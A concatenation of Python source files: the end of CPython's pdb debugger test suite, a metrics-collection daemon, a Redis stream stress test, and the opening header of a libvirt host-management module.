... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13210(self):
# invoking "continue" on a non-main thread triggered an exception
# inside signal.signal
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
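# Illustrative sketch (not part of the upstream test suite): PdbTestCase drives
# pdb non-interactively by piping commands into "python -m pdb <script>". The
# standalone helper below shows that pattern outside of unittest; it is defined
# for reference only and is never invoked by the tests above.
def _example_drive_pdb(script_path, commands="where\ncontinue\nquit\n"):
    """Run `python -m pdb script_path`, feed it commands, return its output."""
    with subprocess.Popen(
        [sys.executable, '-m', 'pdb', script_path],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    ) as proc:
        stdout, _ = proc.communicate(commands.encode())
    return stdout.decode()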
|
oddeye.py
|
import glob
import os
import sys
import time
import logging
import threading
from lib.daemon import Daemon
import lib.upload_cached
import lib.run_bash
import lib.pushdata
import lib.puylogger
import lib.getconfig
import gc
sys.path.append(os.path.dirname(os.path.realpath("__file__"))+'/checks_enabled')
sys.path.append(os.path.dirname(os.path.realpath("__file__"))+'/lib')
cron_interval = int(lib.getconfig.getparam('SelfConfig', 'check_period_seconds'))
log_file = lib.getconfig.getparam('SelfConfig', 'log_file')
pid_file = lib.getconfig.getparam('SelfConfig', 'pid_file')
tsdb_type = lib.getconfig.getparam('TSDB', 'tsdtype')
library_list = []
os.chdir("checks_enabled")
checklist = glob.glob("check_*.py")
logger = logging.getLogger("PuyPuy")
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
handler = logging.FileHandler(log_file)
handler.setFormatter(formatter)
logger.addHandler(handler)
def run_shell_scripts():
lib.run_bash.run_shell_scripts()
module_names = []
for checks in checklist:
module_names.append(checks.split('.')[0])
# Materialise the imported check modules so they can be iterated on every run
# (a bare map() would be exhausted after the first pass under Python 3).
modules = list(map(__import__, module_names))
cluster_name = lib.getconfig.getparam('SelfConfig', 'cluster_name')
extra_tags = ('chart_type', 'check_type')
jsondata = lib.pushdata.JonSon()
def run_scripts():
try:
start_gtime = time.time()
jsondata.prepare_data()
for modol in modules:
try:
# jsondata.prepare_data()
start_time = time.time()
a = modol.runcheck()
time_elapsed = "{:.9f}".format(time.time() - start_time) + " seconds"
message = time_elapsed + ' ' + str(modol).split("'")[1]
for b in a:
if 'reaction' not in b:
b.update({'reaction': 0})
for extra_tag in extra_tags:
if extra_tag not in b:
b.update({extra_tag: 'None'})
jsondata.gen_data(b['name'], b['timestamp'], b['value'], lib.pushdata.hostname, b['check_type'], cluster_name, b['reaction'], b['chart_type'])
# jsondata.put_json()
lib.puylogger.print_message(message)
except Exception as e:
lib.puylogger.print_message(str(e))
jsondata.put_json()
time_elapsed2 = '{:.9f}'.format(time.time() - start_gtime) + ' seconds '
        lib.puylogger.print_message('Spent ' + time_elapsed2 + 'to complete iteration')
except Exception as e:
lib.puylogger.print_message(str(e))
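# Illustrative sketch (not part of this daemon): run_scripts() above expects
# each check module's runcheck() to return an iterable of dicts with at least
# 'name', 'timestamp', 'value' and 'check_type'; a missing 'reaction' and the
# extra_tags ('chart_type', 'check_type') are filled with defaults. The
# function below mimics that contract as a minimal example and is never loaded
# by the check discovery above.
def _example_runcheck():
    now = int(time.time())
    return [{'name': 'example.metric', 'timestamp': now, 'value': 1,
             'check_type': 'example', 'chart_type': 'line', 'reaction': 0}]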
def upload_cache():
lib.upload_cached.cache_uploader()
class App(Daemon):
def run(self):
backends = ('OddEye', 'InfluxDB', 'KairosDB', 'OpenTSDB')
self.hast = 1
if tsdb_type in backends:
def run_normal():
while True:
run_scripts()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(run_scripts))
run_shell_scripts()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(run_shell_scripts))
if self.hast % 25 == 0:
gc.collect()
self.hast = 1
else:
self.hast += 1
time.sleep(cron_interval)
#lib.puylogger.print_message('----------------------------------------')
def run_cache():
while True:
upload_cache()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(upload_cache))
time.sleep(cron_interval)
cache = threading.Thread(target=run_cache, name='Run Cache')
cache.daemon = True
cache.start()
run_normal()
else:
while True:
run_scripts()
run_shell_scripts()
time.sleep(cron_interval)
if __name__ == "__main__":
daemon = App(pid_file)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
else:
print ("Unknown command")
sys.exit(2)
sys.exit(0)
else:
print ("usage: %s start|stop|restart" % sys.argv[0])
sys.exit(2)
|
stress_test_streaming.py
|
from stress_test import *
import time
ITERATION = 10
def push_to_redis_stream(image_dicts):
for image in image_dicts:
start_time = time.time()
DB.xadd(settings.IMAGE_STREAMING, image)
print("* Push to Redis %d ms" % int(round((time.time() - start_time) * 1000)))
def stress_test_stream(image_dicts):
for _ in range(ITERATION):
for i in range(0, NUM_REQUESTS):
# start a new thread to call the API
t = Thread(target=push_to_redis_stream, args=(image_dicts,))
t.daemon = True
t.start()
time.sleep(SLEEP_COUNT)
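# Illustrative sketch (not part of the original stress test): entries pushed
# with DB.xadd() above can be read back with XREAD. This assumes DB is a
# redis-py client, as the xadd call suggests; the helper is an example only
# and is not called by the stress test.
def read_back_from_stream(last_id='0-0', count=10):
    return DB.xread({settings.IMAGE_STREAMING: last_id}, count=count, block=1000)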
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--img_path', help="Path where the images are stored")
args = parser.parse_args()
images = prepare_images(args.img_path)
stress_test_stream(images)
time.sleep(3)
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
